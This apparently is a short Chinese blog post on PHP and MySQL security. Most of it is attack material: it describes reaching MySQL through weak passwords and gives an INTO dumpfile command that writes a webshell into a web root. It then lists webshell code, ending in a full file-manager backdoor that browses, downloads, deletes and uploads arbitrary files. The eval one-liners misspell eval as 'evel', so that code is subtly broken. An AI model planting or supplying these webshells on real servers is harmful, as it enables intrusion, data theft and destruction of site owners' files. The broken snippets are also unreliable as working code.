php中的安全问题

发表于 更新于

php中的安全问题

mysql部分

mysql端口未更改

通过端口扫描,可以找到3306端口,然后通过弱口令,登录到数据库。

mysql文件写权限

通过以下命令,往数据库里面写数据

//写入php可执行脚本,放到web执行目录中
select "<?php  @evel($_GET['test']);" into dumpfile "D:/ShineMDS/xampp/htdocs/extension/test.php";

php部分

常见的php简单的木马

  • 直接执行post 或get的提交参数
<?php  @evel($_GET['test']);
  • 上传文件
<?php
move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);
  • 遍历目录
<?php
	if(!empty($_POST['action'])){
		$action=$_POST['action'];
		switch($action){
		case 'upload':
			upload();
		default:
			break;
		}
	}
	if(!empty($_GET['action'])){
		$action=$_GET['action'];
		switch($action){
		case 'download':
			download();
			exit;
		case 'delete':
			deleteFile();
			break;
		default:
			break;
		}
	}
	function download(){
		if(!empty($_GET['fn']) &&file_exists($_GET['fn']) ){
			$file=$_GET['fn'];
			header('Content-Description: File Transfer');
			header('Content-Type: application/octet-stream');
			header('Content-Disposition: attachment; filename="'.basename($file).'"');
			header('Expires: 0');
			header('Cache-Control: must-revalidate');
			header('Pragma: public');
			header('Content-Length: ' . filesize($file));
			readfile($file);
			exit;
		}
	}
	function deleteFile(){
		if(!empty($_GET['fn']) &&file_exists($_GET['fn']) ){
			$file=$_GET['fn'];
			unlink($file);
			header("Location:".pathinfo(__FILE__)['basename']."?path=".dirname($file));	
		}
	}
	function upload(){
		$path=$_GET['path'];
		move_uploaded_file($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name']);
	}
?>
<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- 上述3个meta标签*必须*放在最前面,任何其他内容都*必须*跟随其后! -->
    <title>文件查看工具</title>
  </head>
 <body>
 <?php
	//var_dump();
	$curPath=dirname(__FILE__);
	//echo $curPath;
	$path=$curPath;
	if(!empty($_GET['path'])){
		$path=$_GET['path'];
	}
	$fh=opendir($path);
	$dirs=array();
	$files=array();
	while($fn=readdir($fh)){
		$fn=iconv('gbk','UTF-8',$fn);
		$fullName=$path.'/'.$fn;
		$info=array();
		$info['fn']=$fn;
		$info['fullname']=$fullName;
		if(is_dir($path.'/'.$fn)){
			$dirs[]=$info;
		}else{
			$files[]=$info;
		}
	}
?>
	<p><a href="?path=<?=dirname($path)?>">返回上一级</a></p>
	<?php foreach($dirs as $v){ ?>
	<a href="?path=<?=$v['fullname']?>"><?=$v['fn']?></a><br>
	<?php }?>
	
	<?php foreach($files as $v){?>
	<p><?=$v['fn']?>   <a href="?action=download&fn=<?=$v['fullname']?>">下载</a>   <a href="?action=delete&fn=<?=$v['fullname']?>">删除</a></p>
	<?php }?>
	<div>
		<form action="<?php  echo pathinfo(__FILE__)['basename']."?path=$path";?>" enctype="multipart/form-data" method="POST">
			<input type="file" name="file">
			<input type="hidden" name="action" value="upload">
			<input type="submit" value="提交" >
		</form>
	</div>
 </body>
	
</html>